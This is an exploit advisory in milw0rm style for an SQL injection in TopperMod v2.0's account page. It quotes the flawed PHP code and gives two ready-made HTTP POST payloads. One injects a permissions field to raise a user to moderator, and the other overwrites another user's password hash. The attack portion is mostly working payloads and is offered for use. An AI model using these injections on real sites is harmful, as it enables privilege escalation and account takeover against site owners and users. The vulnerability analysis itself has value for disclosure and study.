# Author: __GiReX__
# mySite: girex.altervista.org
# CMS: TopperMod v2.0
# Site: rtcw.ch/mio/index.php
# Bug: SQL Injection
# Type: 1 - Priviledge Escalation (from user to mod)
2 - Remote user password change
# File: /account/index.php
# Var : $localita
# Need: magic_quotes_gpc = Off
You must be logged in
# Vuln Code: /account/index.php:
case "edituser_save":
...
$localita=$_POST['localita'];
...
if ($localita!="") {
if (eregi("^[a-zA-Z0-9]",$localita)) {
$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
}
}
# And if our $_POST['localita'] does not begin with a char or a number?
# Input not sanizated
...
$res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito',
tema='$tema_user', time_zone='$time_zone' $pass
WHERE user_id='$user_id' ");
# Vulnerable query :D
# PoC 1:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]
# PoC 2:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]
# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote
# We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times
# and Admins don't use cookies in this CMS...
# milw0rm.com [2008-03-25]
